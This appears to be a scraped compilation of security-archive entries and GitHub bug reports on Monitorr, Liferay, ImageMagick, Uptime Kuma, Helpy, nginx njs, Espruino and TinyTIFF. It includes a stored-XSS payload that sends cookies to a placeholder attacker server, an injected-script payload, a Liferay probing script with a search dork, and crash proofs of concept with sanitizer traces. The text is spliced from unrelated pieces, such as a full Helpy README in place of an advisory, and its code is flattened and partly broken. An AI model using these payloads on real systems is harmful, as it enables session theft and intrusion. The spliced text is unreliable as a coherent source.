Monitorr version 1.7.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Monitorr v1.7.6 - Cross Site Scripting# CVE: CVE-2023-26776# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/Monitorr/# Software Link: https://github.com/Monitorr/Monitorr# Tested on: Ubuntu# Version: v1.7.6# Exploit Description:  Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>The injected script tag is executed everytime the home page is loaded.

Monitorr 1.7.6 Cross Site Scripting

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
*   Root (3,538)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,825)
*   Shell (3,138)
*   Shellcode (1,209)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,180)
*   TCP (2,385)
*   Trojan (687)
*   UDP (881)
*   Virus (663)
*   Vulnerability (31,400)
*   Web (9,473)
*   Whitepaper (3,740)
*   x86 (948)
*   XSS (17,599)
*   Other

**File Archives**

*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (372)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,715)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,194)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,962)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,470)
*   UNIX (9,209)
*   UnixWare (185)
*   Windows (6,534)
*   Other

Liferay Portal 6.2.5 Insecure Permissions

Ubuntu Security Notice 5855-3 - USN-5855-2 fixed vulnerabilities in ImageMagick. Unfortunately an additional mitigation caused a regression. This update fixes the problem. It was discovered that ImageMagick incorrectly handled certain PNG images. If a user or automated system were tricked into opening a specially crafted PNG file, an attacker could use this issue to cause ImageMagick to stop responding, resulting in a denial of service, or possibly obtain the contents of arbitrary files by including them into images.

==========================================================================  
Ubuntu Security Notice USN-5855-3  
March 31, 2023

imagemagick regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

USN-5855-1 introduced a regression in ImageMagick.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

USN-5855-2 fixed vulnerabilities in ImageMagick. Unfortunately an additional  
mitigation caused a regression. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that ImageMagick incorrectly handled certain PNG images.  
 If a user or automated system were tricked into opening a specially crafted  
 PNG file, an attacker could use this issue to cause ImageMagick to stop  
 responding, resulting in a denial of service, or possibly obtain the  
 contents of arbitrary files by including them into images.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.10.4  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.10.4  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.10.4  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.10.4  
  libmagickcore-6.q16-6-extra     8:6.9.11.60+dfsg-1.3ubuntu0.22.10.4

Ubuntu 22.04 LTS:  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3  
  libmagickcore-6.q16-6-extra     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
  imagemagick                     8:6.9.10.23+dfsg-2.1ubuntu11.7  
  imagemagick-6.q16               8:6.9.10.23+dfsg-2.1ubuntu11.7  
  libmagick++-6.q16-8             8:6.9.10.23+dfsg-2.1ubuntu11.7  
  libmagickcore-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.7  
  libmagickcore-6.q16-6-extra     8:6.9.10.23+dfsg-2.1ubuntu11.7

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5855-3  
  https://ubuntu.com/security/notices/USN-5855-1  
  https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/2004580

Package Information:  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.10.4  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.10.23+dfsg-2.1ubuntu11.7

Ubuntu Security Notice USN-5855-3

Uptime Kuma versions 1.19.6 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Stored XSS in uptime-kuma <= v1.19.6# CVE: CVE-2023-26777# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/louislam/# Software Link: https://github.com/louislam/uptime-kuma# Tested on: Ubuntu# Version: <= v1.19.6# Exploit Description:  Stored Cross Site Scripting vulnerability found in Uptime Kuma v.1.19.6 and before, allows a remote attacker to execute arbitrary javascript code via the description, title, footer, and incident creation parameter of the status status page in the application.Create a status page, while giving the title or the discription give the payload: <script>""</script><script>alert("XSS")</script>If anyone loads the page, the javascript inside the script tag will be executed.

Uptime Kuma 1.19.6 Cross Site Scripting

Helpy version 2.8.0 allows an unauthenticated remote attacker to exploit an XSS stored in the application. This is possible because the application does not correctly validate the attachments sent by customers in the ticket.

**Helpy: A Modern Helpdesk Platform**

Helpy is a modern help desk platform written in Ruby on Rails and released under the MIT license. The goal of Helpy is to power your support email and ticketing, integrate seamlessly with your app, and run an amazing customer helpcenter.

 

**Sponsor/Support Helpy**

Helpy is licensed under the MIT license, and is an open-core project. This means that the core functionality is 100% open source and fully hackable or even re-sellable under the MIT license. See the features comparison below to understand what is included.

Helpy is a large system and cannot exist purely as a hobby project. If you use it in a money generating capacity, it makes good sense to support the project financially or by becoming an official sponsor or supporter.

https://www.patreon.com/helpyio

**Open Source Features**

Helpy is an integrated support solution- combining and leveraging synergies between support ticketing, Knowledgebase and a public community. Each feature is optional however, and can be easily disabled.

*   **Multichannel ticketing:** Integrated with inbound email via Sendgrid, Mandrill, Mailgun, etc.
*   **Knowledgebase:** Full text searchable and SEO optimized to help users answer questions before they contact you.
*   **Mobile-friendly:** Support requests come at all times, and Helpy works on all devices out of the box so you can delight customers with prompt answers, from anywhere and at anytime!
*   **Community Support Forums:** Customers and Agents can both answer questions in a publicly accessible forum, and vote both threads and replies up or down accordingly.
*   **Embed Widget:** Helpy Includes a lightweight javascript widget that allows your users to contact you from just about anywhere.
*   **Multi-lingual:** Helpy is fully multi-lingual and can provide support in multiple languages at the same time. Currently the app includes translations for 19 languages and is easy to translate.
*   **Themeable:** Customize the look and functionality of your Helpy without disturbing the underlying system that makes it all work. Helpy comes with two additional themes, and we hope to add more and get more from the community as time goes on.
*   **Sends HTML email:** Responses to customers can include html, emojis and attachments.
*   **Customizable:** Set colors to match your brand both on the helpcenter, and in the ticketing UI.
*   **GDPR Compliant:** Comply with GDPR right to be forgotten requests by deleting users and their history, or by anonymizing them.

**Pro Version**

We also offer a pro version with additional features designed to make your helpcenter even more awesome. This is available as either a turn-key SaaS or AWS/Azure marketplace product. Both spin up in seconds. Proceeds go directly towards supporting the continued development of the project. Some of the things found in the pro version:

*   **Triggers:** Insert events at any point in the ticket lifecycle. This includes an outbound JSON API.
*   **Notifications:** Browser notifications when new tickets are received, you are assigned to a ticket, etc.
*   **Real time UI:** When tickets arrive, they are automatically added to the UI
*   **Custom Views:** Add additional Ticketing queues to highlight just the tickets you need to see
*   **Advanced reporting:** A suite of additional reports on the performance of your ticketing and helpcenter knowledgebase
*   **Advanced search:** Easily filter and find tickets or customers when you have thousands
*   **Customizable Request Forms:** Easily Add questions to the ticket creation forms
*   **AI Support Chatbot:** Create a chatbot for your website to answer up 90% of tier one questions autonomously

**Getting Started:**

**Helpy Pro - 30 Second one-click install via DigitalOcean**

You can launch the free tier of Helpy Pro using the DigitalOcean Marketplace. This "one click" marketplace image spins up a dedicated VM within 30 seconds, running Ubuntu. Launch DigitalOcean Marketplace Image. Use of all features requires either a trial or paid license code, available here: Helpy License Center

**Install Helpy via Docker**

Docker is the recommended way to quickly test or run Helpy in production.

1.  Install Docker and docker-compose
2.  Create config file from template cp docker/.env.sample docker/.env and edit docker/.env to match your needs
3.  Edit docker/Caddyfile to include your URL or turn on SSL
4.  Build Helpy from local git checkout docker-compose build
5.  Run docker-compose up -d to start all of the services

**Install Helpy on your Local System**

Although not required, installing locally is highly recommended and will make it easier for you to customize things like settings, colors and logos to match your site identity. To begin, clone Helpy from the official repo to your local system:

git clone https://github.com/helpyio/helpy.git

**Configure Basic Settings**

There is a settings option in the admin panel to set up things like i18n, system names, colors, the embeddable widget, etc. There is a full guide to getting set up at: Configuring Your Helpy Settings

**Support Multiple Languages (optional)**

Helpy includes support for Multilingual help sites, and multi-language knowledgebase articles. This page explains how to enable Helpy's international capabilities and provides an overview of what functionality this adds to Helpy: How To Set Up A Multilingual Helpy Support Knowledgebase

**Set up your Helpy to send and receive email (optional)**

Helpy has the ability to receive email at your support email addresses and import the messages as tickets in the web interface. Whenever you or the user replies to the email thread, Helpy captures the discussion and sends out messages accordingly. Follow the tutorial on Setting Up Your Helpy Installation To Send And Receive Email to set this up.

**Configure oAuth (optional)**

Helpy supports Omniauth login capabilities. This means you can allow your support users to sign in with a single click via any Omniauth provider- ie. Facebook, Twitter, Gmail, or many others. Read Setting Up Oauth For Your Helpy to see how.

**Live Demo**

There is also a live demo with fake data available at http://demo.helpy.io Admin User: admin@test.com and password: 12345678

**Installation**

Helpy was designed to run on modern cloud providers, although it should work on any linux based system. There is a full guide to installing Helpy in the wiki: https://github.com/helpyio/helpy/wiki

Requirements are:

*   Ruby 2.4+
*   Rails 4.2.x
*   Postgres
*   A server like Unicorn, Puma or Passenger

Helpy leverages two external services to help out:

*   an email provider like Sendgrid
*   Google Analytics for stats (optional)

**Contributing**

Welcome, and thanks for contributing to Helpy. Together we are building the best customer support platform in the world. Here are some of the ways you can contribute:

*   Report or fix Bugs
*   Refactoring
*   Improve test coverage- As with any large and growing codebase, test coverage is not always as good as it could be. Help improving test coverage is always welcome and will help you learn how Helpy works. We use Minitest exclusively.
*   Translate the project- The community has already translated Helpy into 18 languages, but there are many more waiting. We need help getting Helpy translated into as many locales as possible! Please see the guide to translation for more details.
*   Build new features. There is a backlog of new features that we’d like to see built. Check out our roadmap for more insight on this, and if you would like to take one on, please get in touch with us to make sure someone is not already working on it.

**General Guidelines:**

*   Join us on Slack. Let me know you wish to contribute. 
*   Make your PRs granular. They should only include one piece of functionality per PR.
*   Check the roadmap: Trello If you want to build a feature, contact us to make sure no one else is already working on it
*   You must provide passing test coverage. We use minitest, see http://www.rubypigeon.com/posts/minitest-cheat-sheet/?utm\_source=rubyweekly&utm\_medium=email
*   You also must expose functionality to the API. We use Grape. API methods should be tested as well.
*   If your feature/bug fix/enhancement adds or changes text in the project, please create i18n strings in en.yml and any other locales you can.
*   We are hugely concerned with user experience, and a nice UI. Oftentimes that means we may take what you have contributed and “dress it up” or ask you to do the same.

**Security Issues**

If you have found a vulnerability or other security problem in Helpy, please _do not open an issue_ on GitHub. Instead, contact \[hello@helpy.io\](mailto: hello@helpy.io) directly by email. See the SECURITY guide to learn more and see a hall of fame of security reporters.

**License**

Copyright 2016-2021, Helpy.io, LLC, Scott Miller and Contributors. Helpy Core is released under the MIT open source license. Please contribute back any enhancements you make. Also, I would appreciate if you kept the "powered by Helpy" blurb in the footer. This helps me keep track of how many are using Helpy.

CVE-2023-0357: GitHub - helpyio/helpy: Helpy is a modern, open source helpdesk customer support application. Features include knowledgebase, community discussions and support tickets integrated with email.

Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)  
built with ASAN on

**bug**

\> (1..\_\_proto\_\_.length \= '1', Array.prototype.slice.call(1, 0, 2)).toString()
ASAN:SIGSEGV
\===\=\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\=
\==13918\==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000407181 bp 0x7ffdf2511450 sp 0x7ffdf2511430 T0)
    #0 0x407180 in nxt\_lvlhsh\_find nxt/nxt\_lvlhsh.c:181
    #1 0x4479b7 in njs\_object\_property njs/njs\_object\_property.c:757
    #2 0x4210c2 in njs\_primitive\_value njs/njs\_vm.c:2987
    #3 0x4206ec in njs\_vmcode\_string\_argument njs/njs\_vm.c:2864
    #4 0x41473f in njs\_vmcode\_interpreter njs/njs\_vm.c:159
    #5 0x412c4e in njs\_vm\_start njs/njs.c:594
    #6 0x404a75 in njs\_process\_script njs/njs\_shell.c:771
    #7 0x40387b in njs\_interactive\_shell njs/njs\_shell.c:501
    #8 0x402ad1 in main njs/njs\_shell.c:271

njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution.

emmmm, but i think this may cause at least cpde execution, if u can control the js it executed.Maybe LPE?

…

\---Original--- From: "Valentin V. Bartenev"<notifications@github.com> Date: Wed, Jul 3, 2019 15:53 PM To: "nginx/njs"<njs@noreply.github.com>; Cc: "Author"<author@noreply.github.com>;"lokihardt"<nine.twelve@foxmail.com>; Subject: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or mute the thread.

@l0kihardt

njs is used for nginx configuration and is not an application server. njs **only** executes js code from a static file which is a part of nginx config file (which **must** be trusted source anyway).

@l0kihardt If you can control njs script on a server, then you already have a root access and can control the whole server without any bugs needed.

 xeioex changed the title Logic problems happen in the nxt\_lvlhsh.c Array elements left uninitialized in Array.prototype.slice() for primitive this values.

Jul 3, 2019

Yeah sure, I use ubuntu 18.04, and did something like this \`\`\` export CC=clang export CFLAGS=-fsanitize=address ./configure make \`\`\`

…

\------------------ 原始邮件 ------------------ 发件人: "Dmitry Volyntsev"<notifications@github.com>; 发送时间: 2019年7月3日(星期三) 下午4:07 收件人: "nginx/njs"<njs@noreply.github.com>; 抄送: "3087136937"<nine.twelve@foxmail.com>;"Mention"<mention@noreply.github.com>; 主题: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) @l0kihardt please, also share the way you run your POC. Cannot reproduce it (with ASAN enabled). $ cat github188.js var \_export = 1; \_export.\_\_proto\_\_.length= \_export.\_\_proto\_\_.sum = \[1\].slice Error(\_export.sum((\_export.\_\_proto\_\_.length= \[1\].toString(RegExp(Error()))) ===('loading exception'))) //export default \_export; \_export; console.log(\_export) $ ./build/njs github188.js 1 — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.

CVE-2020-19695: Array elements left uninitialized in Array.prototype.slice() for primitive this values. · Issue #188 · nginx/njs

An issue found in Espruino Espruino 6ea4c0a allows an attacker to execute arbitrrary code via oldFunc parameter of the jswrap_object.c:jswrap_function_replacewith endpoint.

**env**

Ubuntu 18.04  
Espruino 6ea4c0a

**bug**

This is a critical bug which will cause memory corruption at last, thus may cause potential remote code execution threat to the users.

It happens at jswrap_object.c:jswrap_function_replacewith:, so if we pass the parameter oldFunc with a null pointer, it may crash. If we provide the oldFunc with another address or another number, it may cause remote code execution.

void jswrap\_function\_replaceWith(JsVar \*oldFunc, JsVar \*newFunc) {
  if (!jsvIsFunction(newFunc)) {
    jsExceptionHere(JSET\_TYPEERROR, "First argument of replaceWith should be a function - ignoring");
    return;
  }
  // If old was native or vice versa...
  if (jsvIsNativeFunction(oldFunc) != jsvIsNativeFunction(newFunc)) {
    if (jsvIsNativeFunction(newFunc))
      oldFunc->flags |= JSV\_NATIVE;
    else
      oldFunc->flags &= ~JSV\_NATIVE;
  }
  // If old fn started with 'return' or vice versa...
  if (jsvIsFunctionReturn(oldFunc) != jsvIsFunctionReturn(newFunc)) {
    if (jsvIsFunctionReturn(newFunc))
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION\_RETURN;
    else
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION;
  }

**poc**

var a "should equal";
for (var i in a)
    a\[i\]\=i;

function test(a,b) {
    return 1;
}

E.mapInPlace.replaceWith.call(a, function(x) {
    return test(\[\].map.call("Hello", function(x) {
        return x + 1;
    }), "H1,e1,l1,l1,o1");
});

CVE-2020-19693: A memory corruption bug in the jswrap_object.c · Issue #1684 · espruino/Espruino

Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)

**bug**

So, actually this is a logic bug, happened under an really interesting circumstance.  
the buggy function is the njs\_module\_read in the file njs\_module.c

if (fstat(fd, &sb) == -1) {
        goto fail;
    }

    text->length = nxt\_length(NJS\_MODULE\_START);

    if (S\_ISREG(sb.st\_mode) && sb.st\_size) {
        text->length += sb.st\_size;
    }

    text->length += nxt\_length(NJS\_MODULE\_END);

    text->start = nxt\_mp\_alloc(vm->mem\_pool, text->length);
    if (text->start == NULL) {
        goto fail;
    }

    p = nxt\_cpymem(text->start, NJS\_MODULE\_START, nxt\_length(NJS\_MODULE\_START));

    n = read(fd, p, sb.st\_size);

as you can see, it read the sb.st\_size and sb.st\_mode with function fstat. However if we dont provide a common .js file. the S\_ISREG(sb.st\_mode) will be 0. text->length wont be updated.  
and read(fd, p, sb.st\_size); still read sb.st\_size bytes into the p. p is on the heap. So we can overflow to the next chunk on the heap....

**poc**

CVE-2020-19692: Heap based buffer overflow in njs_module.c · Issue #187 · nginx/njs

Buffer Overflow vulnerability found in Espruino 2v05.41 allows an attacker to cause a denial of service via the function jsvGarbageCollectMarkUsed in file src/jsvar.c.

Hello,  
I found that IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed . When Object property name is marked ，it will be regarfed as nativeStr struct. And read content pointed by property name and marked，which will result arbitrary memory write.  
Please confirm~~  
poc is here:  
espruino1.js.zip

test version:  
commit d543731 (HEAD -> master, origin/master, origin/HEAD) (20200505)

environment

gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0  
run ./espruino poc  
(gdb) r  
Starting program: /home/zdz/Espruino/espruino /home/zdz/debugBug/espruino1.js  
\[Thread debugging using libthread\_db enabled\]  
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".  
\[New Thread 0x7ffff6e85700 (LWP 4410)\]

| |\_ \_\_\_ \_\_\_ \_ ||\_\_\_ \_\_\_  
| | -| . | | | | | | . |  
||| || |||||\_|  
|| espruino.com  
2v05.41 (c) 2019 G.Williams

Espruino is Open Source. Our work is supported  
only by sales of official boards and donations:  
http://espruino.com/Donate

{ }

Thread 1 "espruino" received signal SIGSEGV, Segmentation fault.  
jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
73 bool jsvIsString(const JsVar \*v) { return v && (v->flags&JSV\_VARTYPEMASK)>=\_JSV\_STRING\_START && (v->flags&JSV\_VARTYPEMASK)<=\_JSV\_STRING\_END; } ///< String, or a NAME too  
(gdb) bt  
#0 jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
#1 0x0000555555565728 in jsvHasCharacterData (v=0x7ffff6644610)  
at src/jsvar.c:384  
#2 0x000055555556f8d2 in jsvGarbageCollectMarkUsed (var=0x7ffff6644610)  
at src/jsvar.c:3715  
#3 0x000055555556f97a in jsvGarbageCollectMarkUsed (var=0x7ffff6644650)  
at src/jsvar.c:3730  
#4 0x000055555556f9cb in jsvGarbageCollectMarkUsed (var=0x7ffff6644670)  
at src/jsvar.c:3738

Dongzhuo Zhao working with ADLab of Venustech

CVE-2020-23257: IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed  · Issue #1820 · espruino/Espruino

Buffer Overflow vulnerability found in tinyTIFF v.3.0 allows a local attacker to cause a denial of service via the TinyTiffReader_readNextFrame function in tinytiffreader.c file.

**Project Address**

https://github.com/jkriege2/TinyTIFF

**Security Issue Report**

A global-buffer-overflow issue was discovered in TinyTIFF in tinytiffreader.c file. The flow allows an attacker to cause a denial of service (abort) via a crafted file.

**OS information**

    ubuntu@ubuntu:~/Documents/TinyTIFF/src$ uname -a
    Linux ubuntu 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    

**Summary**

AddressSanitizer: global-buffer-overflow (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x4969c6) in \_\_asan\_memcpy

**Problem Code location**

        #0 0x4969c6 in __asan_memcpy (/home/ubuntu/Desktop/TinyTIFF/src/asan_tinytiffreader+0x4969c6)
        #1 0x4cdff4 in TinyTIFFReader_readNextFrame /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c
        #2 0x4cb3e9 in TinyTIFFReader_open /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:921:9
        #3 0x4d10ea in main /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:1058:10
        #4 0x7ffff7c4a082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #5 0x41c3bd in _start (/home/ubuntu/Desktop/TinyTIFF/src/asan_tinytiffreader+0x41c3bd)
    

Poc file: id8

asan\_tinytiffreader

**compile the test case in the source**

cd TinyTIFF/
cmake .
make -j4
cd src/

modified the tinytiffreader.c file, add harness

int main(int argc, char \*argv\[\]){
       TinyTIFFReaderFile\* tiffr=NULL;
   tiffr=TinyTIFFReader\_open(argv\[1\]); 
   if (!tiffr) { 
	   printf("ERROR reading (not existent, not accessible or no TIFF file)\\n");
   } else { 
        const uint32\_t width=TinyTIFFReader\_getWidth(tiffr); 
        const uint32\_t height=TinyTIFFReader\_getHeight(tiffr);
        const uint16\_t bitspersample=TinyTIFFReader\_getBitsPerSample(tiffr, 0);		
        uint8\_t\* image=(uint8\_t\*)calloc(width\*height, bitspersample/8);  
        TinyTIFFReader\_getSampleData(tiffr, image, 0); 

	printf("%ld\\n",width);
        printf("%ld\\n",height);
        printf("%u\\n",bitspersample);

							///////////////////////////////////////////////////////////////////
							// HERE WE CAN DO SOMETHING WITH THE SAMPLE FROM THE IMAGE 
							// IN image (ROW-MAJOR!)
							// Note: That you may have to typecast the array image to the
							// datatype used in the TIFF-file. You can get the size of each
							// sample in bits by calling TinyTIFFReader\_getBitsPerSample() and
							// the datatype by calling TinyTIFFReader\_getSampleFormat().
							///////////////////////////////////////////////////////////////////
                
        free(image); 
    } 
    TinyTIFFReader\_close(tiffr); 

}

then,complie the tinytiffreader.c

gcc -o tinytiffreader tinytiffreader.c

test with poc

this program will trigger global-buffer-overflow crash. The asan complie program is asan\_tinytiffreader.

**ASAN Report:**

ubuntu@ubuntu:~/Desktop/TinyTIFF/src$ ./asan\_tinytiffreader out/default/crashes/id\\:000008\\,sig\\:11\\,src\\:000016+000007\\,time\\:306221\\,execs\\:34950\\,op\\:splice\\,rep\\:16 
=================================================================
==3817392==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000004e82c3 at pc 0x0000004969c7 bp 0x7fffffffd890 sp 0x7fffffffd058
READ of size 2082441480 at 0x0000004e82c3 thread T0
    #0 0x4969c6 in \_\_asan\_memcpy (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x4969c6)
    #1 0x4cdff4 in TinyTIFFReader\_readNextFrame /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c
    #2 0x4cb3e9 in TinyTIFFReader\_open /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:921:9
    #3 0x4d10ea in main /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:1058:10
    #4 0x7ffff7c4a082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c3bd in \_start (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x41c3bd)

0x0000004e82c3 is located 61 bytes to the left of global variable '<string literal>' defined in 'tinytiffreader.c:653:13' (0x4e8300) of size 62
0x0000004e82c3 is located 0 bytes to the right of global variable '<string literal>' defined in 'tinytiffreader.c:214:32' (0x4e82c0) of size 3
  '<string literal>' is ascii string 'rb'
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x4969c6) in \_\_asan\_memcpy
Shadow bytes around the buggy address:
  0x000080095000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=\>0x000080095050: 00 00 00 00 00 00 00 00\[03\]f9 f9 f9 f9 f9 f9 f9
  0x000080095060: 00 00 00 00 00 00 00 06 f9 f9 f9 f9 00 00 00 00
  0x000080095070: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 07
  0x000080095080: f9 f9 f9 f9 00 00 00 00 00 00 00 03 f9 f9 f9 f9
  0x000080095090: 00 00 00 00 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0000800950a0: 00 00 00 02 f9 f9 f9 f9 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3817392==ABORTING

**use gdb debug this crah**

ubuntu@ubuntu:~/Documents/TinyTIFF/src$ gdb --args ./tinytiffreader id8
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html\>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86\_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/\>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/\>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./tinytiffreader...
(No debugging symbols found in ./tinytiffreader)
gdb-peda$ r id8
